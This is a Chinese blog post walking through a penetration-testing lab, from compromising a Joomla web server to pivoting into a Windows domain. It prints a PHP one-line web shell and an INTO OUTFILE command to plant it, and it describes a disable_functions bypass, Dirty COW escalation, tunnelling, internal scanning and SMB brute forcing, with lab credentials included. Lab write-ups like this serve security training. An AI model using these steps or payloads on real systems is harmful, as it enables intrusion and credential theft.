当前位置:首页 » 《随便一记》 » 正文

第三次靶场渗透测试_z1moq的博客

26 人参与  2022年04月13日 09:44  分类 : 《随便一记》  评论

点击全文阅读


信息搜集

打开网页发现是一个博客页面,使用 Wappalyzer 插件查看当前页面的信息
请添加图片描述
使用了名为 Joomla 的CMS,后端语言为PHP,使用 ping 命令发现 TTL 为 64 判断为 linux 系统
查看其端口:
请添加图片描述
发现CMS版本号
请添加图片描述
扫描目录

目录作用
1.phpphpinfo界面
/administrator后台登陆界面
/configuration.php~配置文件

在配置文件中发现 mysqli 账号密码,使用 navicat 连接
请添加图片描述

尝试get shell

mysql写马

在当前用户下查询权限,发现可以在任意目录进行文件读写的操作
请添加图片描述
结合在 phpinfo 界面得到的绝对路径信息,尝试写入一句话木马
select "<?php eval($_POST['cmd']);?>" into outfile "/var/www/html/zzz.php"
请添加图片描述
产生1045报错,无法写入

登陆后台

请添加图片描述
发现后台的超级管理员登陆账号密码
修改密码为testadmin
尝试登陆
登陆后台后模板写入一句话

因为py到了后门,直接上车!

执行命令

请添加图片描述
发现命令无法执行
返回浏览 phpinfo 界面,发现许多函数被ban,于是需要使用蚁剑插件绕过 disable_functions
请添加图片描述
成功绕过

搜集主机信息

网卡信息

使用ifconfig命令查看当前机器的网卡信息
请添加图片描述
发现存在地址为 192.168.93.120 的内网地址

敏感文件信息

请添加图片描述
在目录中浏览发现一串用户名和密码,adduser是linux创建新用户的操作,尝试使用ssh连接

控制出网机、搭建隧道

SSH连接

发现密码被改了…
技术太拉爆破没成,原地上车 firefart:123456
请添加图片描述

搭建隧道

请添加图片描述
在tmp文件夹中上传隧道配置文件
请添加图片描述
提示文件权限不足,用户可以使用脏牛进行提权
参考文章 工具下载
提权后为文件赋予可执行权限
请添加图片描述
请添加图片描述
成功搭建隧道

内网信息搜集

内网存活主机探测

可以使用工具serverscan或者fscan
在出网机中上传fscan,并根据前面拿到的网卡信息进行扫描
使用命令./fscan -h 192.168.93.0/24
请添加图片描述
有5台存活主机
请添加图片描述
其中20 30 10为windows主机
请添加图片描述请添加图片描述
100 120已被拿下
并获得所有主机的端口开放信息
请添加图片描述

内网网络拓补

主机IP主机系统主机作用开放端口
192.168.93.100CentOS出网机22、80、3306
192.168.93.120Ubuntuweb服务器22、80、3306
192.168.93.10Windows Server 2012 R288、135、139、445
192.168.93.20win200880、135、139、445、1433
192.168.93.30win7135、139、445

尝试拿下域内的20主机

配置proxychains

  • 安装proxychains
    sudo apt-get install proxychains
  • 配置文件
    sudo vim /etc/proxychains.conf
  • 在最后一行改为 socks5 127.0.0.1:1234 即可

爆破SMB服务

使用proxychains msfconsole挂载代理启动msf
配置爆破设置后启动

请添加图片描述
得到账号、密码为Administrator:123qwe!ASD

控制20主机

莫名其妙上了个3389的车,直接用远程桌面发现存在域控
请添加图片描述
请添加图片描述
发现主机10为域控


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/37925.html

发现  主机  信息  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1